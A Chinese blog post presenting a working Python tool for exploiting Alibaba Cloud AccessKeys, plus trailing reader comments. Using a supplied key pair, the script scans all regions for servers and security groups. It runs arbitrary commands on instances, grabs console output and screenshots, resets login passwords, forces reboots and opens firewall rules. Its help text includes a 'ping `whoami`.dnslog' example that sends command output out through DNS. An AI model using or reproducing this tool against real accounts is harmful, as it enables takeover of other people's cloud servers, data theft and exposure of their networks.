阿里云Accesskey利用工具
看了某某提供的利用脚本功能有BUG。查询阿里云文档后重写的利用工具。
实现了扫描实例机器、安全组网络配置;执行系统命令、获取系统console、屏幕截图、修改系统密码、重启系统、修改安全组网络配置等功能。
阿里云文档中的vnc相关功能利用失败。
import argparse import base64 import io import json import threading import uuid from PIL import Image from aliyunsdkecs.request.v20140526.AuthorizeSecurityGroupEgressRequest import AuthorizeSecurityGroupEgressRequest from aliyunsdkecs.request.v20140526.AuthorizeSecurityGroupRequest import AuthorizeSecurityGroupRequest from aliyunsdkecs.request.v20140526.DescribeInstanceVncUrlRequest import DescribeInstanceVncUrlRequest from aliyunsdkecs.request.v20140526.DescribeInstancesRequest import DescribeInstancesRequest from aliyunsdkecs.request.v20140526.DescribeRegionsRequest import DescribeRegionsRequest from aliyunsdkecs.request.v20140526.DescribeSecurityGroupAttributeRequest import DescribeSecurityGroupAttributeRequest from aliyunsdkecs.request.v20140526.DescribeSecurityGroupsRequest import DescribeSecurityGroupsRequest from aliyunsdkecs.request.v20140526.GetInstanceConsoleOutputRequest import GetInstanceConsoleOutputRequest from aliyunsdkecs.request.v20140526.GetInstanceScreenshotRequest import GetInstanceScreenshotRequest from aliyunsdkecs.request.v20140526.ModifyInstanceAttributeRequest import ModifyInstanceAttributeRequest from aliyunsdkecs.request.v20140526.ModifyInstanceVncPasswdRequest import ModifyInstanceVncPasswdRequest from aliyunsdkecs.request.v20140526.RebootInstanceRequest import RebootInstanceRequest from aliyunsdkecs.request.v20140526.RevokeSecurityGroupEgressRequest import RevokeSecurityGroupEgressRequest from aliyunsdkecs.request.v20140526.RevokeSecurityGroupRequest import RevokeSecurityGroupRequest from aliyunsdkecs.request.v20140526.RunCommandRequest import RunCommandRequest from prettytable import PrettyTable from aliyunsdkcore.client import AcsClient def describe_regions_request(): request = DescribeRegionsRequest() request.set_accept_format('json') response = client.do_action_with_exception(request) return json.loads(response) def describe_instances_request(region_id='cn-hangzhou', page_size=100, page_num=1): client.set_region_id(region_id) request = DescribeInstancesRequest() request.set_accept_format('json') request.set_PageSize(page_size) request.set_PageNumber(page_num) response = client.do_action_with_exception(request) return json.loads(response) def describe_security_groups_request(region_id='cn-hangzhou'): client.set_region_id(region_id) request = DescribeSecurityGroupsRequest() request.set_accept_format('json') request.set_PageSize(100) response = client.do_action_with_exception(request) return json.loads(response) def describe_security_group_attribute_request(region_id, group_id): client.set_region_id(region_id) request = DescribeSecurityGroupAttributeRequest() request.set_accept_format('json') request.set_SecurityGroupId(group_id) response = client.do_action_with_exception(request) return json.loads(response) def authorize_security_group_request(region_id, group_id, ip_protocol, port_range, source_cidr_ip): client.set_region_id(region_id) request = AuthorizeSecurityGroupRequest() request.set_accept_format('json') request.set_SecurityGroupId(group_id) request.set_IpProtocol(ip_protocol) request.set_PortRange(port_range) request.set_SourceCidrIp(source_cidr_ip) response = client.do_action_with_exception(request) return json.loads(response) def authorize_security_group_egress_request(region_id, group_id, ip_protocol, port_range, dest_cidr_ip): client.set_region_id(region_id) request = AuthorizeSecurityGroupEgressRequest() request.set_accept_format('json') request.set_SecurityGroupId(group_id) request.set_IpProtocol(ip_protocol) request.set_PortRange(port_range) request.set_DestCidrIp(dest_cidr_ip) response = client.do_action_with_exception(request) return json.loads(response) def revoke_security_group_request(region_id, group_id, ip_protocol, port_range, source_cidr_ip): client.set_region_id(region_id) request = RevokeSecurityGroupRequest() request.set_accept_format('json') request.set_SecurityGroupId(group_id) request.set_IpProtocol(ip_protocol) request.set_PortRange(port_range) request.set_SourceCidrIp(source_cidr_ip) response = client.do_action_with_exception(request) return json.loads(response) def revoke_security_group_egress_request(region_id, group_id, ip_protocol, port_range, dest_cidr_ip): client.set_region_id(region_id) request = RevokeSecurityGroupEgressRequest() request.set_accept_format('json') request.set_SecurityGroupId(group_id) request.set_IpProtocol(ip_protocol) request.set_PortRange(port_range) request.set_DestCidrIp(dest_cidr_ip) response = client.do_action_with_exception(request) return json.loads(response) # def describe_instance_vnc_url_request(region_id, instance_id): # client.set_region_id(region_id) # request = DescribeInstanceVncUrlRequest() # request.set_accept_format('json') # request.set_InstanceId(instance_id) # response = client.do_action_with_exception(request) # return json.loads(response) # # # def modify_instance_vnc_passwd_request(region_id, instance_id, password): # client.set_region_id(region_id) # request = ModifyInstanceVncPasswdRequest() # request.set_accept_format('json') # request.set_InstanceId(instance_id) # request.set_VncPassword(password) # response = client.do_action_with_exception(request) # return json.loads(response) def modify_instance_attribute_request(instance_id, password): request = ModifyInstanceAttributeRequest() request.set_accept_format('json') request.set_InstanceId(instance_id) request.set_Password(password) response = client.do_action_with_exception(request) return json.loads(response) def reboot_instance_request(instance_id, force): request = RebootInstanceRequest() request.set_accept_format('json') request.set_InstanceId(instance_id) request.set_ForceStop(force) response = client.do_action_with_exception(request) return json.loads(response) def run_command_request(region_id, instance_id, types, command, timed, frequency): client.set_region_id(region_id) request = RunCommandRequest() request.set_accept_format('json') request.set_Type(types) request.set_CommandContent(command) request.set_InstanceIds([instance_id]) if timed and frequency: request.set_Timed(timed) request.set_Frequency(frequency) response = client.do_action_with_exception(request) return json.loads(response) def get_instance_console_output_request(region_id, instance_id): client.set_region_id(region_id) request = GetInstanceConsoleOutputRequest() request.set_accept_format('json') request.set_InstanceId(instance_id) response = client.do_action_with_exception(request) return json.loads(response) def get_instance_screenshot_request(region_id, instance_id, wakeup): client.set_region_id(region_id) request = GetInstanceScreenshotRequest() request.set_accept_format('json') request.set_InstanceId(instance_id) request.set_WakeUp(wakeup) response = client.do_action_with_exception(request) return json.loads(response) def scan_instances(thread_num): def get_instances(rid): try: result = PrettyTable() result.title = f"{rid['RegionId']} <-> {rid['RegionEndpoint']} <-> {rid['LocalName']}" result.field_names = ['主机名', '系统名', '系统类型', '状态', '实例ID', '安全组ID', '公网IP', '内网IP', '有效期'] instance_data = describe_instances_request(region_id=rid['RegionId']) count = int(instance_data['TotalCount']) print(f"{rid['RegionId']} {rid['LocalName']}: {count}") if count > 0: for i in instance_data['Instances']['Instance']: host_name = i['HostName'] os_name = i['OSName'] os_type = i['OSType'] status = i['Status'] instance_id = i['InstanceId'] security_group_id = i['SecurityGroupIds']['SecurityGroupId'] public_ip = i['PublicIpAddress']['IpAddress'] internal_ip = i['VpcAttributes']['PrivateIpAddress']['IpAddress'] expired_time = i['CreationTime'] + ' - ' + i['ExpiredTime'] result.add_row( [host_name, os_name, os_type, status, instance_id, security_group_id, public_ip, internal_ip, expired_time]) if count > int(instance_data['PageSize']): page = 1 while True: page += 1 instance_data = describe_instances_request(region_id=rid['RegionId'], page_num=page) if len(instance_data['Instances']['Instance']) == 0: break for i in instance_data['Instances']['Instance']: host_name = i['HostName'] os_name = i['OSName'] os_type = i['OSType'] status = i['Status'] instance_id = i['InstanceId'] security_group_id = i['SecurityGroupIds']['SecurityGroupId'] public_ip = i['PublicIpAddress']['IpAddress'] internal_ip = i['VpcAttributes']['PrivateIpAddress']['IpAddress'] expired_time = i['CreationTime'] + ' - ' + i['ExpiredTime'] result.add_row( [host_name, os_name, os_type, status, instance_id, security_group_id, public_ip, internal_ip, expired_time]) print(result) except Exception as err: print(err) finally: td.release() region_data = describe_regions_request() regions = region_data['Regions']['Region'] print(f"查询到 {len(regions)} 个地区可用") td = threading.BoundedSemaphore(int(thread_num)) thread_list = [] for rid in regions: td.acquire() t = threading.Thread(target=get_instances, args=(rid,)) t.start() thread_list.append(t) for x in thread_list: x.join() def scan_security_groups(thread_num): def get_security_groups(rid): try: result = PrettyTable() result.title = f"{rid['RegionId']} <-> {rid['RegionEndpoint']} <-> {rid['LocalName']}" result.field_names = ['安全组名称', '描述', '组ID', 'VPC ID', '类型', 'Tag', '创建时间'] security_group_data = describe_security_groups_request(rid['RegionId']) count = int(security_group_data['TotalCount']) print(f"{rid['RegionId']} {rid['LocalName']}: {count}") if count > 0: for i in security_group_data['SecurityGroups']['SecurityGroup']: desc = i['Description'] name = i['SecurityGroupName'] vpc_id = i['VpcId'] group_id = i['SecurityGroupId'] create_time = i['CreationTime'] types = i['SecurityGroupType'] tag = i['Tags']['Tag'] result.add_row([name, desc, group_id, vpc_id, types, tag, create_time]) print(result) except Exception as err: print(err) finally: td.release() region_data = describe_regions_request() regions = region_data['Regions']['Region'] print(f"查询到 {len(regions)} 个地区可用") td = threading.BoundedSemaphore(int(thread_num)) thread_list = [] for rid in regions: td.acquire() t = threading.Thread(target=get_security_groups, args=(rid,)) t.start() thread_list.append(t) for x in thread_list: x.join() def get_security_group_rule(region, group_id): security_group_attribute_data = describe_security_group_attribute_request(region, group_id) inner_access_policy = security_group_attribute_data['InnerAccessPolicy'] if inner_access_policy == 'Accept': access_policy = '内网互通' elif inner_access_policy == 'Accept': access_policy = '内网隔离' else: access_policy = inner_access_policy result = PrettyTable() result.title = f"{region} <-> {group_id} <-> {access_policy}" result.field_names = ['描述', 'IP协议', '策略', '端口范围', '源IP地址段(入方向)', '目标IP地址段(出方向)', '网卡类型', '规则优先级', '创建时间'] for i in security_group_attribute_data['Permissions']['Permission']: policy = i['Policy'] desc = i['Description'] priority = i['Priority'] create_time = i['CreateTime'] nictype = i['NicType'] port_range = i['PortRange'] source_cidr_ip = i['SourceCidrIp'] ip_protocol = i['IpProtocol'] dest_cidr_ip = i['DestCidrIp'] result.add_row( [desc, ip_protocol, policy, port_range, source_cidr_ip, dest_cidr_ip, nictype, priority, create_time]) print(result) def get_console_output(region, instance_id): instance_console_output_data = get_instance_console_output_request(region, instance_id) console_output = instance_console_output_data['ConsoleOutput'] output = base64.b64decode(console_output).decode('utf-8') last_update_time = instance_console_output_data['LastUpdateTime'] print(f"更新时间: {last_update_time}\n{output}") def get_screenshot(region, instance_id, wakeup=False): screenshot_data = get_instance_screenshot_request(region, instance_id, wakeup) screenshot = base64.b64decode(screenshot_data['Screenshot']) image = io.BytesIO(screenshot) img = Image.open(image) img.show() jpg_name = uuid.uuid4().hex + '.jpg' img.save(jpg_name) result = PrettyTable() result.field_names = ['文件名'] result.add_row([jpg_name]) print(result) def run_command(region, instance_id, types, command, timed=None, frequency=None): commands_data = run_command_request(region, instance_id, types, command, timed, frequency) print(commands_data) if __name__ == "__main__": print(''' _ _ _ _____ _ _ _ / \ | (_)_ _ _ _ _ __ | ____|_ ___ __ | | ___ (_) |_ / _ \ | | | | | | | | | '_ \ | _| \ \/ / '_ \| |/ _ \| | __| / ___ \| | | |_| | |_| | | | | | |___ > <| |_) | | (_) | | |_ /_/ \_\_|_|\__, |\__,_|_| |_| |_____/_/\_\ .__/|_|\___/|_|\__| |___/ |_| ''') parser = argparse.ArgumentParser() parser.add_argument("--threads", help="扫描线程数, 默认为8", default="8") base_key = parser.add_argument_group('Accesskey', '必须提供ACCESSKEYID和ACCESSKEYSECRET') base_key.add_argument('-ak', '--accesskeyid', required=True, help='Aliyun AccessKeyId, eg: LTAIxxxxxx') base_key.add_argument('-sk', '--accesskeysecret', required=True, help='Aliyun AccessKeySecret, eg: xxxxxx') ecs = parser.add_argument_group('ECS', '选择一种利用方式,扫描所有或利用指定实例安全组') ecs.add_argument('-s', '--scan', dest='scan_type', help='扫描所有地区主机或安全组, 0: 主机, 1:安全组') ecs.add_argument('-i', '--instance_id', help='实例ID, eg: i-xxxxxxx') ecs.add_argument('-g', '--group_id', help='安全组ID, eg: sg-xxxxxxx') region = parser.add_argument_group('Region', '利用指定实例安全组需要设置地区参数') region.add_argument('-r', '--region', help='地区, eg: cn-hangzhou') instance = parser.add_argument_group('Instance', '实例利用相关,执行系统命令、获取系统console、屏幕截图') instance.add_argument('-t', '--type', dest='cmd_type', help='Linux(RunShellScript: 0) Windows(RunBatScript: 1, RunPowerShellScript: 2)', default="0") instance.add_argument('-c', '--command', help='执行系统命令, eg: ping `whoami`.dnslog.xxx') instance.add_argument('--console', action='store_true', help='实例最近一次启动、重启或者关机时的系统命令行输出') instance.add_argument('--screen', help='0: 屏幕截图, 1: 唤醒处于休眠状态的实例并截图') instance.add_argument('--password', help='(无需region参数) 修改实例登陆密码,在ECS控制台重启后生效,操作系统内重启不生效') instance.add_argument('--reboot', help='(无需region参数) 重启实例使修改的密码生效, eg: 0: 正常关机, 1: 断电关机') security_group = parser.add_argument_group('Security Group', '安全组利用相关,查询、增加、删除网络出入规则') security_group.add_argument('-d', '--dump', action='store_true', help='查询安全组配置内容') security_group.add_argument('--add', dest='rule_add', action='store_true', help='增加出入规则') security_group.add_argument('--del', dest='rule_del', action='store_true', help='删除出入规则') security_group.add_argument('--in', dest='net_in', action='store_true', help='入方向规则, 允许其他设备发送入方向流量到安全组内实例') security_group.add_argument('--out', dest='net_out', action='store_true', help='出方向规则, 允许安全组内实例发送出方向流量到其他设备') security_group.add_argument('-p', '--protocol', help='传输层协议, 0: tcp, 1: udp, 2: icmp, 3: gre, 4: all') security_group.add_argument('--port', help='端口范围, 起始端口/终止端口, eg: -1/-1 8080/8081') security_group.add_argument('--ip', help='IPv4 CIDR地址段, eg: 0.0.0.0/0') args = parser.parse_args() threads = args.threads accesskeyid = args.accesskeyid accesskeysecret = args.accesskeysecret scan_type = args.scan_type groupid = args.group_id instanceid = args.instance_id region = args.region cmd_type = args.cmd_type command = args.command console = args.console screen = args.screen password = args.password reboot = args.reboot dump = args.dump net_in = args.net_in net_out = args.net_out rule_add = args.rule_add rule_del = args.rule_del protocol = args.protocol port = args.port ip = args.ip if not accesskeyid or not accesskeysecret: parser.print_help() exit(1) client = AcsClient(accesskeyid, accesskeysecret) if scan_type or groupid or instanceid: if scan_type: if scan_type == '0': scan_instances(threads) elif scan_type == '1': scan_security_groups(threads) else: parser.print_help() print('ERROR: scan参数错误!') exit(1) if instanceid: if password: print(modify_instance_attribute_request(instanceid, password)) exit(1) elif reboot: if reboot == '0': reboot_instance_request(instanceid, False) elif reboot == '1': reboot_instance_request(instanceid, True) else: print('ERROR: reboot参数错误!') else: if not region: parser.print_help() print('ERROR: 缺少region参数!') exit(1) if command: if cmd_type == '0': cmd_type = 'RunShellScript' elif cmd_type == '1': cmd_type = 'RunBatScript' elif cmd_type == '2': cmd_type = 'RunPowerShellScript' else: parser.print_help() print('ERROR: type参数错误!') exit(1) run_command(region, instanceid, cmd_type, command) elif console: print(region, instanceid) get_console_output(region, instanceid) exit(1) elif screen: if screen == '0': wakeup = False elif screen == '1': wakeup = True else: parser.print_help() print('ERROR: screen参数错误!') exit(1) get_screenshot(region, instanceid, wakeup) exit(1) else: parser.print_help() print('ERROR: 缺少对实例的操作!') exit(1) if not region: parser.print_help() print('ERROR: 缺少region参数!') exit(1) if groupid: if dump: get_security_group_rule(region, groupid) exit(1) else: if protocol: if protocol == '0': protocol = 'tcp' elif protocol == '1': protocol = 'udp' elif protocol == '2': protocol = 'icmp' elif protocol == '3': protocol = 'gre' elif protocol == '4': protocol = 'all' else: parser.print_help() print('ERROR: protocol参数错误!') exit(1) if rule_add or rule_del: if protocol and port and ip: if rule_add: if net_in: authorize_security_group_request(region, groupid, protocol, port, ip) get_security_group_rule(region, groupid) exit(1) elif net_out: authorize_security_group_egress_request(region, groupid, protocol, port, ip) get_security_group_rule(region, groupid) exit(1) elif rule_del: if net_in: revoke_security_group_request(region, groupid, protocol, port, ip) get_security_group_rule(region, groupid) exit(1) elif net_out: revoke_security_group_egress_request(region, groupid, protocol, port, ip) get_security_group_rule(region, groupid) exit(1) else: parser.print_help() print('ERROR: 缺少安全组配置设置参数!') exit(1) else: parser.print_help() print('ERROR: 没有指定扫描或对实例、安全组的操作!') exit(1) print('ERROR: 没有执行任何操作!')
你是衣冠楚楚的人 而我只是一个打满补丁的猴子
-
小博客一个,没必要伤害她
热门文章
存档
标签
最新评论
- yz
想想你喜欢什么,想做什么,找好一个自己的... - 小屿
@Jahan:testfun1024#p... - Jahan
Hello dear Xia0 i a... - brave
@万:你的手机应该是anroid7.0以... - jhsy
新版的cookie机制应该又变了. 而且... - 小屿
@janto:无兴趣 - janto
新版的这些好像不起作用了,deviceI... - hunk
正在研究,可否发一份新源码?todz$1... - miffy
请问可以加个好友咨询下吗? - vegetableChicken
@Snkrs:我也遇到和你一样的问题了,...
发表评论: